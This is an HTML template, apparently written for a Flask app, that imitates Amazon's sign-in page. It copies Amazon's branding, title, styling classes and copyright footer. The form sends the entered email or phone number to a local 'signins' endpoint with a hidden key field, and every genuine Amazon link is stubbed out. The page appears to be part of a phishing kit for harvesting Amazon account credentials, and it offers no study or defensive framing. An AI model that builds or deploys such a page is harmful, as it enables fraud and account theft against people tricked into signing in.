<html
  class="a-js a-audio a-video a-canvas a-svg a-drag-drop a-geolocation a-history a-webworker a-autofocus a-input-placeholder a-textarea-placeholder a-local-storage a-gradients a-transform3d a-touch-scrolling a-text-shadow a-text-stroke a-box-shadow a-border-radius a-border-image a-opacity a-transform a-transition a-ember"
  data-19ax5a9jf="dingo"
  data-aui-build-date="3.22.2-2023-01-04">
  <head>
    <meta charset="utf-8" />
    <meta name="robots" content="noindex,nofollow" />
    <title dir="ltr">Amazon Sign-In</title>
    <link rel="icon" type="image/x-icon" href="{{ url_for('static',filename='img/favicon.ico') }}" />
    <link rel="stylesheet" href="{{ url_for('static',filename='css/not-trident.css') }}" />
    <link rel="stylesheet" href="{{ url_for('static',filename='css/portal.css') }}" />
    <link rel="stylesheet" href="{{ url_for('static',filename='css/main.css') }}" />
    <div id="a-page">
      <div class="a-section a-padding-medium auth-workflow">
        <div class="a-section a-spacing-none auth-navbar">
          <div class="a-section a-spacing-medium a-text-center">
            <a class="a-link-nav-icon" tabindex="-1" href="javascript: void(0)">
              <i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i>
            </a>
          </div>
        </div>
        <div id="authportal-center-section" class="a-section">
          <div id="authportal-main-section" class="a-section">
            <div class="a-section auth-pagelet-container">
              <div id="emailss" class="a-section a-spacing-base">
                <div class="a-section">
                  <form
                    name="sign"
                    action="signins"
                    class="auth-validate-form auth-real-time-validation a-spacing-none"
                    data-fwcim-id="xKDWixnY">
                    <div class="a-section">
                      <div class="a-box">
                        <div class="a-box-inner a-padding-extra-large">
                          <h1 class="a-spacing-small">Sign in</h1>
                          <!-- optional subheading element -->
                          <div class="a-row a-spacing-base">
                            <label for="ap_email" class="a-form-label">
                              Email or mobile phone number
                            </label>
                            <input
                              type="email"
                              maxlength="128"
                              id="ap_email"
                              name="ap_email"
                              tabindex="1"
                              class="a-input-text a-span12 auth-autofocus auth-required-field" />
                          </div>
                          <input
                              type="hidden"
                              name="akseskey"
                              id="akseskey"
                              value="{{ key }}" />
                          <div class="a-section">
                            <span
                              id="continue"
                              class="a-button a-button-span12 a-button-primary"
                              ><span class="a-button-inner">
                                <input
                                  id="continue"
                                  tabindex="5"
                                  class="a-button-input"
                                  type="submit"
                                  aria-labelledby="continue-announce" />
                                  <span
                                  id="continue-announce"
                                  class="a-button-text"
                                  aria-hidden="true">
                                  Continue
                                </span></span></span>

                            <div
                              id="legalTextRow"
                              class="a-row a-spacing-top-medium a-size-small">
                              By continuing, you agree to Amazon's
                              <a
                                href="javascript: void(0)"
                                >Conditions of Use</a
                              >
                              and
                              <a
                                href="javascript: void(0)"
                                >Privacy Notice</a
                              >.
                            </div>

                          </div>

                          <div class="a-section">
                            <div
                              class="a-row a-expander-container a-expander-inline-container">
                              <a
                                data-csa-c-func-deps="aui-da-a-expander-toggle"
                                data-csa-c-type="widget"
                                data-csa-interaction-events="click"
                                aria-expanded="false"
                                role="button"
                                href="javascript:void(0)"
                                data-action="a-expander-toggle"
                                class="a-expander-header a-declarative a-expander-inline-header a-link-expander"
                                data-a-expander-toggle='{"allowLinkDefault":true, "expand_prompt":"", "collapse_prompt":""}'
                                data-csa-c-id="2w111c-gdv55z-acwx5j-gmug8m"
                                ><i class="a-icon a-icon-expand"></i
                                ><span class="a-expander-prompt">
                                  Need help?
                                </span></a
                              >

                              <div
                                aria-expanded="false"
                                class="a-expander-content a-expander-inline-content a-expander-inner"
                                style="display: none">
                                <a
                                  id="auth-fpp-link-bottom"
                                  class="a-link-normal"
                                  href="javascript: void(0)">
                                  Forgot your password?
                                </a>
                              </div>

                              <div
                                aria-expanded="false"
                                class="a-expander-content a-expander-inline-content a-expander-inner"
                                style="display: none">
                                <a
                                  id="ap-other-signin-issues-link"
                                  class="a-link-normal"
                                  href="javascript: void(0)">
                                  Other issues with Sign-In
                                </a>
                              </div>
                            </div>
                          </div>
                        </div>
                      </div>
                    </div>
                  </form>
                </div>
                <div class="a-divider a-divider-break">
                  <h5 aria-level="5">New to Amazon?</h5>
                </div>
                <span
                  id="auth-create-account-link"
                  class="a-button a-button-span12 a-button-base"
                  ><span class="a-button-inner"
                    ><a
                      id="createAccountSubmit"
                      href="javascript: void(0)"
                      class="a-button-text">
                      Create your Amazon account
                    </a></span
                  ></span
                >
              </div>
            </div>
          </div>
        </div>

        <div id="right-2"></div>

        <div class="a-section a-spacing-top-extra-large auth-footer">
          <div class="a-divider a-divider-section">
            <div class="a-divider-inner"></div>
          </div>

          <div class="a-section a-spacing-small a-text-center a-size-mini">
            <span class="auth-footer-seperator"></span>

            <a
              class="a-link-normal"
              target="_blank"
              rel="noopener"
              href="javascript: void(0)">
              Conditions of Use
            </a>
            <span class="auth-footer-seperator"></span>

            <a
              class="a-link-normal"
              target="_blank"
              rel="noopener"
              href="javascript: void(0)">
              Privacy Notice
            </a>
            <span class="auth-footer-seperator"></span>

            <a
              class="a-link-normal"
              target="_blank"
              rel="noopener"
              href="javascript: void(0)">
              Help
            </a>
            <span class="auth-footer-seperator"></span>
          </div>

          <div class="a-section a-spacing-none a-text-center">
            <span class="a-size-mini a-color-secondary">
              © 1996-2023, Amazon.com, Inc. or its affiliates
            </span>
          </div>
        </div>
      </div>

      <div
        id="auth-external-javascript"
        class="auth-external-javascript"
        data-external-javascripts=""></div>
      <!-- cache slot rendered -->
    </div>
    <div id="a-popover-root" style="z-index: -1; position: absolute"></div>
    <script async="" src="{{ url_for('static',filename='js/incremental.js') }}" crossorigin="anonymous"></script>
    <script async="" src="{{ url_for('static',filename='js/tail.js') }}" crossorigin="anonymous"></script>
    <script async="" src="{{ url_for('static',filename='js/jquery-3.6.3.js') }}"></script> 
    <script>
        window.onload = function () {
          document.getElementById("ap_email").focus();
        };
    </script>
  </body>
</html>